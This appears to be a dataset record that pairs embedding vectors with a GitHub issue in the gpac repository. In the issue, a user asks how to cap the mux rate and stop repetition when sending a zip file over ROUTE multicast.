0.006867330987006426, -0.022766100242733955, -0.018797267228364944, 0.05303235724568367, -0.0022305152378976345, 0.0011552975047379732, -0.005484489258378744, 0.0120002506300807, -0.0016162446700036526, 0.0013320590369403362, 0.005691525060683489, -0.006859518121927977, 0.01684410125017166, -0.006050907541066408, -0.013125274330377579, 0.003494213568046689, 0.0028145117685198784, 0.009672076441347599, -0.006386851891875267, 0.008125169202685356, -0.004437592811882496, 0.003312569111585617, 0.0019150790758430958, 0.017875373363494873, -0.029891248792409897, -0.013742473907768726, -0.024281756952404976, -0.0014248344814404845, 0.01497687492519617, -0.0064454469829797745, 0.016719099134206772, -0.0008574397652409971, 0.0029531866312026978, -0.020328549668192863, 0.021969208493828773, -0.016109710559248924, -0.0016191743779927492, 0.016594097018241882, 0.012890893965959549, -0.017703494057059288, -0.0051641701720654964, 0.002406300278380513, -0.0017705447971820831, -0.0033067096956074238, 0.01440655067563057, -0.02154732495546341, 0.00611340906471014, 0.003412180580198765, -0.006511854473501444, -0.028641222044825554, -0.014679993502795696, 0.01497687492519617, -0.003439524909481406, -0.00029614876257255673, -0.008875185623764992, 0.008234546519815922, 0.005312610883265734, -0.017969125881791115, -0.022312965244054794, -0.018781641498208046, -0.014875310473144054, -0.006519667338579893, 0.006289193872362375, 0.006347788963466883, -0.00535558070987463, -0.005386831238865852, 0.0042618075385689735, 0.002511771162971854, 0.01556282490491867, 0.002091840608045459, -0.01427373569458723, -0.009297069162130356, -0.0036719515919685364, -0.030656889081001282, 0.010390842333436012, -0.021391071379184723, 0.014562804251909256, -0.003957113716751337, -0.019734786823391914, 0.013531532138586044, -0.011117419227957726, -0.016531595960259438, -0.001482452847994864, 0.0006889792275615036, -0.009203317575156689, -0.004574314225465059, -0.009734578430652618, -0.0074103111401200294, 0.016328465193510056, -0.00041114140185527503, -0.007812662981450558, -0.016453469172120094, 0.015031564049422741, -0.010101773776113987, -0.036469511687755585, -0.009109565056860447, 0.011609617620706558, 0.008890810422599316, -0.018297256901860237, -0.0008867372525855899, 0.003332100808620453, -0.017640992999076843, -0.011156482622027397, 0.019578533247113228, -0.006074345670640469, 0.007929853163659573, 0.007558751385658979, 0.003755937796086073, 0.011695556342601776, 0.012328382581472397, -0.00860174186527729, 0.040344592183828354, -0.015140941366553307, 0.0052618286572396755, 0.020875435322523117, 0.011570554226636887, -0.0043946229852736, -0.020281672477722168, 0.004691504407674074, -0.004363372456282377, -0.011976812966167927, 0.01316433772444725, -0.008281422778964043, -0.019828539341688156, -0.0047227549366652966, -0.021500449627637863, 0.03054751269519329, -0.015265943482518196, -0.010039271786808968, -0.0077970377169549465, -0.0034414781257510185, 0.012672139331698418, 0.01884414255619049, -0.013594034127891064, 0.02260984666645527, 0.02481301873922348, 0.008672055788338184, 0.017125356942415237, -0.0001263454178115353, 0.008828309364616871, -0.0012724874541163445, -0.013250276446342468, -0.014508115127682686, 0.016125336289405823, -0.01457061618566513, 0.02364111877977848, -0.0028262308333069086, 0.005613398272544146, -0.011195546016097069, 0.0031035803258419037, -0.013609658926725388, 0.007121242582798004, 0.018891019746661186, -0.011195546016097069, 0.001694371341727674, -0.01603158377110958, -0.021625451743602753, -0.018125377595424652, -0.0018183973152190447, 0.02023479714989662, -0.00447665574029088, -0.004980572499334812, -0.026250548660755157, -0.0009419142152182758, -0.01626596413552761, 0.018875394016504288, 0.01965666003525257, -0.007316559087485075, -0.010054897516965866, -0.013047147542238235, 0.008101731538772583, -0.012804955244064331, -0.0007241361890919507, -0.026609931141138077, 0.02690681256353855, 0.004289152100682259, -0.009047063998878002, -0.006144659593701363, -0.016656598076224327, -0.004492281470447779, 0.011867435649037361, -0.005746213719248772, 0.014429988339543343, -0.012469010427594185, 0.0042383698746562, -0.00842205062508583, 0.0006865377654321492, 0.011515865102410316, -0.019844165071845055, 0.017656618729233742, 0.05312610790133476, 0.013219025917351246, 0.012156504206359386, 0.01732848584651947, -0.038219548761844635, 0.0035664807073771954, 0.0035098388325423002, 0.008382987231016159, -0.019828539341688156, -0.0032090514432638884, -0.005511833820492029, -0.013844039291143417, 0.013133086264133453, -0.012164316140115261, 0.017015980556607246, -0.009797079488635063, 0.018000375479459763, -0.0036289819981902838, 0.008570491336286068, 0.014336236752569675, -0.00026807200629264116, -0.0013701458228752017, -0.028172463178634644, 0.005187608301639557, -0.02470364049077034, 0.01792224869132042, -0.004187587182968855, 0.013664348050951958, -0.015172191895544529, 0.018437884747982025, 0.0052618286572396755, 0.014648742973804474, 0.0015166332013905048, 0.0087736202403903, 0.002914123237133026, -0.015101877972483635, -0.00644154055044055, -0.0037188276182860136, -0.002908263821154833, -0.005484489258378744, -0.01311746146529913, 0.007554845418781042, 0.013070585206151009, -0.004242275841534138, 0.011336173862218857, 0.02315673418343067, -0.016297215595841408, -0.016359716653823853, 0.008750182576477528, -0.00015088205691426992, 0.00189554737880826, -0.008289235644042492, 0.008687681518495083, -0.009984583593904972, -0.011039293371140957, 0.004562595393508673, -0.002218796405941248, 0.013562782667577267, -0.004351653158664703, 0.031110024079680443, 0.005492302123457193, 0.02423488162457943, 0.01614096201956272, -0.02107856422662735, 0.008711119182407856, 0.003091861493885517, 0.0023555178195238113, -0.013969041407108307, 0.004906352609395981, 0.0034571033902466297, -0.025328652933239937, 0.023687994107604027, -0.010336153209209442, 0.01142211351543665, -0.026172421872615814, -0.005898560397326946, -0.0022305152378976345, 0.009968957863748074, 0.018656639382243156, -0.011140857823193073, 0.004957134835422039, 0.010320527479052544, -0.01603158377110958, -0.010453343391418457, -0.008859559893608093, -0.00767203513532877, -0.012976833619177341, 0.010976791381835938, -0.0011308829998597503, -0.004457124508917332, -0.027891207486391068, 0.010468968190252781, 0.0058712163008749485, 0.015008125454187393, 0.004984478931874037, 0.006843892857432365, -0.005109481513500214, 0.022531719878315926, 0.01976603828370571, -0.011578367091715336, 0.016578471288084984, 0.0019082429353147745, -0.004160243086516857, 0.0026836497709155083, 0.02001604251563549, 0.004793068859726191, 0.01217994187027216, 0.01499250065535307, 0.01516437903046608, -0.011359612457454205, 0.013422154821455479, 0.006500135641545057, -0.0028672474436461926, -0.00878143310546875, 0.0020039479713886976, 0.003211004426702857, 0.007511875592172146, -0.00801579188555479, -0.005488395690917969, -0.02479739300906658, 0.01675034873187542, -0.005347767844796181, -0.008515803143382072, 0.015695640817284584, -0.003630935214459896, 0.009976770728826523, 0.008812683634459972, 0.007238432299345732, -0.019828539341688156, 0.006617325823754072, 0.006492323242127895, -0.017187858000397682, 0.013140899129211903, -0.04206337779760361, 0.02423488162457943, -0.003666092175990343, -0.005621211137622595, -0.011922123841941357, -0.0070821791887283325, 0.000045044886064715683, -0.01064865943044424, 0.026203671470284462, -0.0014092091005295515, 0.0003361886483617127, 0.011531490832567215, 0.0022734850645065308, 0.006043094675987959, 0.01123460941016674, 0.0005229601520113647, -0.00337897683493793, 0.028984980657696724, -0.020281672477722168, -0.0071251485496759415, -0.01310964860022068, 0.0075860959477722645, 0.02950061671435833, -0.020219171419739723, -0.033875707536935806, -0.008031417615711689, -0.0053672995418310165, -0.005543084349483252, -0.0061876289546489716, -0.025813039392232895, 0.0032832715660333633, 0.0026289611123502254, 0.014586241915822029, -0.006972801871597767, -0.013383091427385807, 0.007457186933606863, -0.011476801708340645, -0.015750328078866005, 0.0163909662514925, -0.00014514462964143604, 0.011633055284619331, 0.0027012282516807318, -0.02071918174624443, 0.00018567281949799508, 0.009039251133799553, 0.014508115127682686, 0.02503177337348461, 0.01310964860022068, -0.00626184931024909, -0.0029024044051766396, 0.01013302430510521, -0.021859832108020782, 0.0008969914051704109, -0.0350944809615612, -0.017359737306833267, 0.014695619232952595, 0.007300933822989464, -0.022062961012125015, -0.000014206229025148787, -0.01440655067563057, -0.0216567013412714, -0.0007343903416767716, 0.02351611666381359, -0.0003276435600128025, 0.0020078544039279222, -0.023687994107604027, 0.019984792917966843, -0.03687576949596405, 0.008742369711399078, 0.004863382782787085, 0.0036074970848858356, 0.018203504383563995, 0.0009497268474660814, 0.0013584267580881715, -0.027422446757555008, 0.01768786832690239, -0.004246182274073362, 0.0013769818469882011, 0.008664242923259735, -0.0016172212781384587, 0.027469323948025703, 0.017515990883111954, 0.01848476007580757, -0.002248093718662858, -0.019000396132469177, 0.0024824736174196005, -0.007879070937633514, -0.013937790878117085, -0.00430477736517787, -0.0006611465942114592, -0.012336195446550846, 0.01334402896463871, -0.003625075565651059, 0.003136784303933382, 0.017828498035669327, 0.008101731538772583, 0.02729744464159012, 0.011383050121366978, -0.02435988374054432, 0.009328319691121578, -0.0056954314932227135, -0.004316496197134256, 0.011797120794653893, 0.0029863903764635324, -0.007511875592172146, 0.03765703737735748, 0.017265984788537025, 0.011273672804236412, -0.007062647491693497, -0.0007197415689006448, 0.00035279057919979095, 0.0008374198223464191, -0.017594117671251297, 0.012383070774376392, -0.023016106337308884, -0.013211213052272797, -0.034125711768865585, -0.0014092091005295515, 0.01298464648425579, -0.003974692430347204, 0.010765849612653255, -0.0022559063509106636, -0.007211088202893734, 0.005769651848822832, -0.015930019319057465, -0.0016289402265101671, 0.012625264003872871, 0.003951254300773144, 0.01685972698032856, -0.016312841325998306, 0.009703327901661396, 0.019594158977270126, 0.0032149108592420816, -0.0018125377828255296, 0.009914269670844078, 0.007629065308719873, 0.009461134672164917, 0.026422426104545593, 0.020406676456332207, 0.008359549567103386, -0.0006259896326810122, 0.011984624899923801, -0.00017688357911538333, 0.0007226713350974023, 0.012461197562515736, 0.00901581346988678, 0.0009541214676573873, -0.015640951693058014, 0.004074303898960352, 0.010242401622235775, 0.023812996223568916, 0.01064865943044424, -0.013711223378777504, -0.0007968916324898601, -0.009047063998878002, 0.002611382631585002, -0.02248484455049038, -0.0012636982137337327, 0.009867393411695957, -0.01310964860022068, 0.010211151093244553, -0.0003464427718427032, -0.01743786409497261, 0.019875414669513702, 0.0004946392145939171, -0.00837517436593771, 0.011125232093036175, 0.004820412956178188, -0.0003010316868312657, -0.00775406789034605, 0.005168076604604721, 0.01721910946071148, 0.005546990782022476, -0.0016055022133514285, -0.006718890275806189, 0.01252369862049818, -0.0030176411382853985, 0.007035302929580212, 0.03650076314806938, 0.0028477157466113567, 0.005793089512735605, 0.0010205290745943785, 0.016078460961580276, 0.01685972698032856, 0.0018730859737843275, -0.018937895074486732, -0.02354736626148224, -0.0021894988603889942, -0.0007153469487093389, 0.017625367268919945, 0.006320444401353598, -0.016469093039631844, -0.008515803143382072, -0.0009839072590693831, -0.0012969020754098892, -0.02084418572485447, -0.007707192096859217, -0.02306298166513443, 0.008679868653416634, 0.01007052231580019, 0.012859643436968327, 0.002978577744215727, 0.00047364269266836345, -0.0021113723050802946, -0.005230578128248453, 0.02015667036175728, 0.004500093869864941, -0.008218921720981598, -0.011195546016097069, 0.012320569716393948, 0.006523573771119118, 0.010062710382044315, -0.01885976828634739, 0.019875414669513702, -0.0029258423019200563, -0.002681696554645896, -0.014195608906447887, -0.004027427639812231, -0.0005239367019385099, -0.006101689767092466, 0.03537573665380478, 0.0022109835408627987, 0.013851851224899292, 0.02634429931640625, -0.026172421872615814, 0.030985021963715553, -0.0030430322512984276, -0.006238411646336317, -0.0058360593393445015, 0.005734494887292385, -0.0023301267065107822, -0.009734578430652618, 0.005894654430449009, -0.008687681518495083, -0.008625180460512638, 0.016078460961580276, -0.0056251175701618195, -0.006148566026240587, 0.006015750579535961, 0.017844121903181076, -0.04143836349248886, 0.005859497468918562, -0.020328549668192863, 0.012367445975542068, -0.01100804191082716, -0.016453469172120094, 0.004429779946804047, 0.019734786823391914, 0.0040860227309167385, 0.0005522576393559575, 0.0017881232779473066, -0.0013252230128273368, -0.01848476007580757, 0.02260984666645527, 0.0012373304925858974, -0.011515865102410316, 0.00914081558585167, -0.007242338731884956, 0.032719433307647705, 0.014304986223578453, 0.01071116141974926, -0.015000313520431519, 0.009836142882704735, 0.0030371728353202343, 0.0033106158953160048, -0.011461176909506321, -0.01778162084519863, 0.015523761510848999, 0.00617200369015336, 0.010383029468357563, 0.01194556150585413, -0.0035059326328337193, 0.003714921185746789, 0.0031778006814420223, -0.006156378425657749, -0.0008139818091876805, -0.016125336289405823, -0.009023625403642654, -0.016812851652503014, 0.0005468864110298455, -0.02892247959971428, -0.012242442928254604, -0.014500302262604237, 0.004277433268725872, -0.010523657314479351, -0.012258068658411503, 0.013172149658203125, -0.0063048191368579865, 0.013828413560986519, -0.0016289402265101671, -0.01368778571486473, -0.03031313233077526, 0.023344237357378006, 0.0018750391900539398, 0.01217212900519371, -0.008554866537451744, -0.012914331629872322, -0.004285245668143034, -0.008390800096094608, 0.018641013652086258, -0.007238432299345732, -0.016219088807702065, -0.02085980959236622, 0.008109544403851032, 0.00792594626545906, -0.012945583090186119, 0.005671993363648653, -0.009531448595225811, -0.0017373409355059266, -0.012789329513907433, -0.009929894469678402, 0.011148669756948948, -0.0029609992634505033, -0.005211046431213617, 0.01515656616538763, -0.017375363036990166, -0.00684779928997159, 0.0033242881763726473, 0.007816568948328495, -0.005918092094361782, -0.026391176506876945, -0.0028106055688112974, -0.008140794932842255, -0.0316256619989872, 0.013758099637925625, 0.0008740416960790753, -0.004988385364413261, 0.024313008412718773, 0.010390842333436012, 0.013453406281769276, -0.016125336289405823, -0.0008984562591649592, 0.006933738477528095, -0.010008021257817745, 0.010695535689592361, 0.01662534661591053, -0.004636815749108791, -0.013656535185873508, -0.005925904959440231, 0.007304839789867401, 0.011523677967488766, 0.0003271552559453994, -0.002656305441632867, 0.019297277554869652, -0.008140794932842255, 0.029563117772340775, 0.0022656721994280815, 0.003433665493503213, 0.010398654267191887, 0.023000480607151985, -0.00825017224997282, -0.009508010931313038, 0.0022598127834498882, -0.008578304201364517, 0.005285266786813736, -0.011711182072758675, 0.001356473658233881, 0.018922269344329834, 0.006875143386423588, 0.011250235140323639, 0.010687722824513912, -0.010343966074287891, -0.004273526836186647, -0.0057305884547531605, -0.015281569212675095, 0.008312673307955265, -0.020578553900122643, 0.004789162427186966, 0.026531804352998734, 0.01457061618566513, -0.000544444948900491, 0.0012217052280902863, -0.014242485165596008, -0.0146253053098917, 0.0024785674177110195, -0.010554907843470573, -0.010633034631609917, -0.0037950011901557446, -0.02703181467950344, 0.0044141546823084354, -0.020906686782836914, -0.02143794670701027, 0.03262568265199661, -0.013851851224899292, -0.009883019141852856, -0.008132982067763805, 0.004726661369204521, -0.008453301154077053, 0.0029629524797201157, 0.015328444540500641, 0.0032403019722551107, 0.005546990782022476, 0.008297048509120941, -0.008148607797920704, -0.013250276446342468, -0.02551615796983242, 0.0001492951123509556, 0.0003525464271660894, -0.02189108170568943, -0.0029570930637419224, -0.01035177893936634, -0.021328570321202278, 0.002474660985171795, -0.01734411157667637, 0.014179983176290989, -0.0134690310806036, 0.010929916054010391, 0.00410164799541235, -0.02129731886088848, -0.034250713884830475, 0.0030879550613462925, -0.015914395451545715, -0.0007524571265093982, -0.0034531971905380487, -0.0002651422400958836, 0.01234400738030672, 0.02237546630203724, 0.0019766038749367, 0.006109502632170916, 0.03356320038437843, 0.00837517436593771, -0.005429801065474749, 0.015367507934570312, 0.003494213568046689, 0.007531407289206982, 0.017250360921025276, -0.015726890414953232, -0.02307860739529133, -0.012234630063176155, -0.0017822637455537915, 0.018422259017825127, -0.0028125587850809097, -0.02037542499601841, -0.0044493116438388824, 0.007000145968049765, 0.012679952196776867, 0.011343986727297306, 0.008898623287677765, 0.005054792854934931, 0.011836184188723564, -0.006433728151023388, -0.009156441316008568, 0.001492218696512282, 0.022547345608472824, 0.002128950785845518, 0.0017217156710103154, -0.0014043261762708426, 0.009101752191781998, 0.007211088202893734, 0.017297236248850822, 0.016937853768467903, 0.0146253053098917, -0.01837538368999958, 0.0074103111401200294, 0.008625180460512638, -0.007894695736467838, -0.012429947033524513, -0.01064865943044424, 0.031672537326812744, 0.010367403738200665, -0.008531427942216396, 0.01217994187027216, 0.02293797954916954, -0.02587554045021534, -0.0140549810603261, 0.014562804251909256, 0.01586751826107502, 0.022547345608472824, 0.0056954314932227135, 0.025313029065728188, 0.004933696705847979, -0.00262114848010242, 0.015859706327319145, -0.004890726879239082, -0.008265797980129719, -0.010687722824513912, -0.00284185609780252, -0.017469115555286407, -0.004211025312542915, -0.005804808810353279, -0.005070418119430542, 0.010031459853053093, -0.010218963027000427, 0.02657867968082428, -0.017265984788537025, -0.006511854473501444, -0.00012890894140582532, 0.004996198229491711, 0.007636878173798323, -0.004535250831395388, -0.0009995326399803162, 0.0001146264185081236, -0.0087736202403903, 0.003669998375698924, -0.030641265213489532, -0.0016474953154101968, 0.007277495693415403, 0.028953729197382927, 0.03321944177150726, 0.01637534238398075, 0.0240005012601614, 0.015695640817284584, 0.0040508657693862915, 0.0018965239869430661, 0.011445551179349422, 0.0003535230061970651, -0.013422154821455479, 0.004128992557525635, -0.019172275438904762, -0.005578241311013699, 0.024953646585345268, 0.002162154531106353, 0.0020351987332105637, 0.015836268663406372, 0.03725077584385872, 0.007390779443085194, 0.016906602308154106, -0.005328236147761345, -0.007886883802711964, -0.007832194678485394, -0.0012490495573729277, 0.019516032189130783, -0.016234714537858963, -0.012437759898602962, -0.004410248249769211, 0.010804913006722927, 0.02904748171567917, 0.0005693478160537779, -0.01804725080728531, -0.011523677967488766, 0.010179899632930756, -0.015969082713127136, -0.043157149106264114, 0.03381320461630821, 0.011351799592375755, -0.03203191980719566, -0.012601825408637524, -0.00918769184499979, 0.028484970331192017, 0.012922144494950771, 0.021047314628958702, 0.0005688595119863749, 0.021000437438488007, 0.0014912420883774757, -0.011445551179349422, -0.0018711327575147152, 0.006300912704318762, 0.010383029468357563, -0.007015771232545376, -0.005961061920970678, 0.009242380037903786, 0.003666092175990343, -0.014922186732292175, 0.015180004760622978, -0.0029277955181896687, 0.007422029972076416, -0.004277433268725872, -0.0070470222271978855, 0.015351883135735989, -0.032594431191682816, 0.02164107747375965, -0.010515844449400902, -0.020422302186489105, 0.0016230808105319738, -0.003529370529577136, -0.0058712163008749485, -0.026875561103224754, -0.002589897718280554, -0.005785277113318443, 0.00825017224997282, -0.00017554077203385532, -0.006882956251502037, 0.005699337925761938, 0.01564876362681389, 0.01159399189054966, -0.01128929853439331, -0.01615658774971962, 0.01837538368999958, -0.022047335281968117, 0.0328131839632988, 0.000983419013209641, -0.018312882632017136, -0.004246182274073362, 0.0020098076201975346, 0.01826600544154644, -0.02142232283949852, -0.00914081558585167, 0.014594054780900478, -0.005316517315804958, 0.02023479714989662, -0.0216723270714283, -0.014297173358500004, -0.01146898977458477, 0.0027305257972329855, -0.0019375404808670282, 0.006629044655710459, 0.006132940296083689, -0.006652482785284519, 0.019109774380922318, 0.00024841827689670026, 0.008414237760007381, 0.0036973427049815655, -0.003916097339242697, 0.0021914520766586065, -0.00914081558585167, -0.00865643098950386, 0.015031564049422741, -0.01921915076673031, -0.006640763487666845, -0.01850038580596447, 0.0007788248476572335, 0.0021719203796237707, -0.015234692953526974, 0.021266069263219833, -0.00412508612498641, -0.007250151131302118, 0.0128830811008811, -0.0012881128350272775, -0.03128190338611603, -0.003609450301155448, -0.0025039585307240486, 0.0016426123911514878, 0.026438051834702492, 0.0010332247475162148, 0.024406759068369865, -0.0024238787591457367, 0.006265755742788315, 0.020547304302453995, -0.012734640389680862, -0.012023688293993473, -0.0003972250851802528, -0.007183743640780449, 0.00878143310546875, 0.007965009659528732, 0.02131294459104538, 0.0043946229852736, 0.011429926380515099, -0.001753942808136344, -0.00021362749976105988, -0.003968833014369011, -0.00883612222969532, -0.0017217156710103154, 0.01194556150585413, -0.019641034305095673, -0.02084418572485447, 0.022500470280647278, -0.0199066661298275, 0.0025273964274674654, 0.015914395451545715, -0.029063107445836067, 0.016312841325998306, 0.01588314399123192, 0.017609743401408195, -0.0015732750762254, -0.005609492305666208, -0.01597689650952816, -0.015781579539179802, 0.00138186477124691, -0.008468926884233952, -0.02565678581595421, 0.05781370773911476, -0.008234546519815922, -0.004074303898960352, 0.02143794670701027, -0.0015107736689969897, 0.0054727704264223576, 0.013414342887699604, -0.005054792854934931, -0.0024238787591457367, -0.021875455975532532, -0.026156796142458916, -0.02598491683602333, -0.01557845063507557, -0.015789391472935677, -0.008281422778964043, -0.004402435850352049, 0.002373096300289035, 0.007875164039433002, -0.008922060951590538, -0.01306277234107256, -0.017531616613268852, -0.006191535387188196, -0.00785172637552023, 0.00430477736517787, -0.013539345003664494, 0.00778531888499856, 0.009648638777434826, 0.0017724978970363736, -0.0017412472516298294, -0.02179732918739319, -0.012242442928254604, 0.00561730470508337, 0.019484782591462135, 0.006804829463362694, 0.023500490933656693, 0.013234651647508144, -0.012312756851315498, 0.02503177337348461, 0.0004282316076569259, 0.0041563366539776325, 0.012031501159071922, -0.009047063998878002, 0.00913300272077322, -0.029125608503818512, 0.007175931241363287, -0.0016601908719167113, 0.003127018455415964, -0.01779724657535553, -0.007093898020684719, 0.006672014482319355, -0.011117419227957726, 0.007484531030058861, 0.011343986727297306, -0.006738421972841024, 0.0036016376689076424, -0.020781684666872025, -0.008226734586060047, 0.009000187739729881, 0.002544974908232689, -0.0046797851100564, -0.0036172629334032536, -0.0011279531754553318, 0.0019433998968452215, 0.011929936707019806, -0.02260984666645527, 0.00027246662648394704, 0.0022715318482369184, 0.02468801476061344, -0.00011889896268257871, 0.008140794932842255, -0.009304882027208805, 0.014515927992761135, -0.009320506826043129, -0.000380623183446005, 0.006004031747579575, 0.0028828727081418037, -0.0011474848724901676, 0.007617346476763487, -0.0099455201998353, 0.025250528007745743, 0.01164868101477623, -0.028406843543052673, 0.0031641286332160234, -0.012164316140115261, -0.004468843340873718, -0.014078418724238873, -0.03150065615773201, 0.009242380037903786, -0.023328611627221107, -0.00931269396096468, 0.010000208392739296, 0.002980530960485339, 0.006894675083458424, -0.006425915285944939, 0.0003828204935416579, -0.0019746506586670876, 0.00552745908498764, -0.0055899606086313725, -0.004453218076378107, 0.021937957033514977, 0.026031794026494026, 0.022625472396612167, -0.01953165791928768, 0.007718910928815603, 0.009859580546617508, -0.004461030475795269, 0.013937790878117085, -0.010156461969017982, -0.009461134672164917, 0.014679993502795696, 0.006097783334553242, 0.03559449315071106, 0.0033164755441248417, 0.01860976405441761, -0.007742349058389664, 0.009023625403642654, 0.003408274380490184, -0.000655287120025605, 0.000927753746509552, 0.017969125881791115, -0.017359737306833267, 0.00807829387485981, -0.012336195446550846, -0.029453739523887634, -0.010375216603279114, -0.012554949149489403, 0.018297256901860237, -0.008812683634459972, -0.002416066126897931, 0.029219359159469604, -0.0076564098708331585, -0.007484531030058861, -0.009383008815348148, -0.016437843441963196, 0.02259422093629837, -0.0006430798093788326, 0.02901623025536537, 0.011609617620706558, 0.016453469172120094, 0.005500114988535643, -0.005515740253031254, 0.021922333166003227, 0.010742411948740482, 0.012562762014567852, 0.004273526836186647, 0.016437843441963196, -0.0031778006814420223, -0.00769547326490283, -0.012914331629872322, -0.025938041508197784, 0.00714077427983284, 0.029344363138079643, 0.003675858024507761, 0.009515823796391487, -0.006648576352745295, 0.011218984611332417, -0.002707087667658925, 0.008273609913885593, 0.02892247959971428, 0.008711119182407856, 0.01234400738030672, 0.0028457625303417444, 0.012804955244064331, -0.0025430219247937202, 0.014289360493421555, 0.009859580546617508, 0.03153190761804581, -0.010414279997348785, -0.0050860438495874405, 0.005343861412256956, 0.01253151148557663, 0.0014687806833535433, -0.01271120272576809, -0.011797120794653893, 0.02823496423661709, 0.015726890414953232, 0.01664097234606743, 0.01675034873187542, 0.009328319691121578, -0.006574355997145176, 0.024063002318143845, -0.02412550337612629, -0.011609617620706558, 0.012148691341280937, 0.010929916054010391, 0.003019594354555011, 0.00009387402678839862, -0.005195421166718006, -0.0003725663700606674, -0.02785995602607727, -0.0020801215432584286, -0.01767224445939064, -0.012086189351975918, 0.010843976400792599, 0.009984583593904972, 0.002062543062493205, -0.014062793925404549, -0.011617429554462433, 0.02679743431508541, -0.009242380037903786, 0.004828225821256638, 0.00005319324918673374, 0.017187858000397682, 0.0056602745316922665 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I'm using below command to send a file using route. gpac -i ./gpac.zip:mime=application/octet-string -o route://225.1.1.0:6000 Questions: -How to set a limit the route mux rate? -This command keep sending the file forever, how to exit after send file 2x. Thanks
Question ROUTE
https://api.github.com/repos/gpac/gpac/issues/2786/comments
1
2024-03-21T03:18:41
2024-04-08T15:11:21Z
https://github.com/gpac/gpac/issues/2786
2,199,026,477
2,786
false
This is a GitHub Issue repo:gpac owner:gpac Title : Question ROUTE Issue date: --- start body --- I'm using below command to send a file using route. gpac -i ./gpac.zip:mime=application/octet-string -o route://225.1.1.0:6000 Questions: -How to set a limit the route mux rate? -This command keep sending the file forever, how to exit after send file 2x. Thanks --- end body ---
384
[ -0.06617166846990585, 0.008051594719290733, -0.01398793887346983, 0.0001554215414216742, -0.01854444481432438, 0.018726401031017303, -0.009848418645560741, 0.06932558864355087, -0.04545890539884567, 0.022699126973748207, -0.04200172424316406, 0.01537536084651947, 0.026520222425460815, -0.008544394746422768, 0.010811274871230125, -0.001340036978945136, -0.02609565667808056, 0.016376124694943428, 0.01942390203475952, 0.005197145044803619, 0.04300248995423317, 0.0025246525183320045, -0.029022131115198135, 0.02797587774693966, -0.046611301600933075, -0.006311631295830011, -0.017710475251078606, 0.012926523573696613, -0.044397491961717606, -0.03260061889886856, 0.02194097265601158, 0.04545890539884567, 0.010386708192527294, 0.009181243367493153, 0.023684727028012276, -0.013070573098957539, 0.049704570323228836, 0.055466536432504654, -0.024063805118203163, 0.004317686427384615, -0.014799163676798344, -0.013942450284957886, -0.034329209476709366, 0.005151655524969101, -0.036543019115924835, 0.02077341638505459, 0.013699840754270554, 0.02758163772523403, 0.014018265530467033, -0.04109194129705429, 0.0026421663351356983, -0.03854454308748245, -0.017210092395544052, -0.019378412514925003, -0.03866584971547127, -0.011721058748662472, 0.03460214287042618, -0.02265363745391369, -0.027505822479724884, -0.024564186111092567, 0.01724041998386383, 0.010432197712361813, -0.014094080775976181, 0.015345034189522266, -0.016421612352132797, 0.00391586497426033, 0.010060702450573444, 0.04451879486441612, -0.02664152719080448, 0.011069046333432198, -0.009590646252036095, 0.02421543560922146, -0.033176813274621964, -0.011872690171003342, 0.010568665340542793, -0.041577160358428955, 0.04181976988911629, -0.005712689366191626, 0.021804505959153175, 0.042183682322502136, -0.03975759074091911, -0.002268775599077344, -0.028354955837130547, -0.029613491147756577, 0.008347274735569954, -0.018119877204298973, -0.03863552212715149, -0.056952521204948425, 0.018301835283637047, 0.018589932471513748, 0.029370881617069244, 0.011046302504837513, 0.0014840862713754177, -0.0003800246340688318, -0.004294941667467356, -0.022092605009675026, 0.014776418916881084, -0.002977649448439479, -0.0063647017814219, -0.023078205063939095, 0.022062277421355247, -0.019742326810956, -0.0250948928296566, -0.0015229416312649846, 0.0363004095852375, 0.01816536672413349, 0.01573927514255047, -0.02538299188017845, 0.01100839488208294, 0.061349812895059586, 0.03414725139737129, 0.0013485662639141083, 0.004025797359645367, 0.019954610615968704, -0.022456517443060875, 0.0010301416041329503, -0.018969010561704636, -0.02764229103922844, 0.007373046595603228, -0.024715816602110863, -0.02200162597000599, 0.002221390837803483, -0.028021367266774178, -0.028476260602474213, -0.007115274202078581, 0.01915096677839756, -0.007448861841112375, 0.009833255782723427, -0.02353309653699398, -0.05516327545046806, -0.05152413994073868, -0.014852234162390232, -0.02662636525928974, -0.046035103499889374, 0.013062991201877594, -0.04394260048866272, -0.039363350719213486, 0.002856344683095813, -0.01492046844214201, -0.022805269807577133, -0.029416371136903763, -0.03899943456053734, 0.03299485892057419, 0.00026653846725821495, 0.004969698842614889, -0.006008369382470846, 0.0009202092769555748, -0.03933302313089371, -0.004275987856090069, 0.03996987268328667, -0.025534622371196747, -0.03766508400440216, 0.012198695912957191, 0.025337502360343933, -0.015345034189522266, -0.019833305850625038, -0.040060851722955704, -0.00815773569047451, 0.03332844376564026, -0.011933342553675175, -0.02100086212158203, -0.04230498522520065, 0.02788490056991577, -0.00043878157157450914, 0.004503434058278799, 0.0012594831641763449, 0.043184444308280945, 0.02100086212158203, -0.037543781101703644, 0.017392050474882126, -0.021834831684827805, -0.024700652807950974, -0.007016714196652174, 0.03172115981578827, -0.02071276493370533, -0.02576206997036934, 0.014222966507077217, 0.06750602275133133, 0.017103951424360275, 0.01241097878664732, -0.01489014271646738, -0.005091003142297268, -0.0169978104531765, -0.01206222828477621, 0.046641625463962555, 0.00023751539993099868, 0.010606572963297367, -0.036239754408597946, 0.011190351098775864, -0.04448847100138664, 0.006300258915871382, 0.01816536672413349, 0.009969723410904408, 0.0021721108350902796, 0.007084948010742664, 0.025170709937810898, -0.020151730626821518, 0.006440517492592335, -0.00034424924524500966, 0.012744566425681114, -0.011372308246791363, 0.004112984985113144, -0.0068423389457166195, -0.028673380613327026, -0.03675530105829239, -0.0301593616604805, 0.01034880056977272, 0.022744616493582726, 0.002500012516975403, -0.03957563266158104, -0.014033428393304348, -0.06786993891000748, 0.029097946360707283, -0.00015115692804101855, -0.005663409363478422, 0.013434486463665962, -0.007001551333814859, -0.014003102667629719, -0.017134277150034904, -0.032782573252916336, 0.037574104964733124, 0.0016461416380479932, -0.009044775739312172, 0.005996997468173504, -0.06999276578426361, -0.032782573252916336, -0.007680098991841078, -0.011357145383954048, -0.018453465774655342, -0.02012140490114689, 0.03851421922445297, 0.03951498121023178, -0.019211620092391968, 0.030341317877173424, -0.0501897856593132, -0.03178181126713753, -0.013093317858874798, -0.016573244705796242, -0.010121354833245277, -0.006993969436734915, -0.034662794321775436, 0.07399582117795944, -0.01085676345974207, 0.02383635751903057, -0.0041433111764490604, 0.02756647579371929, 0.009499668143689632, 0.004886301700025797, -0.03975759074091911, 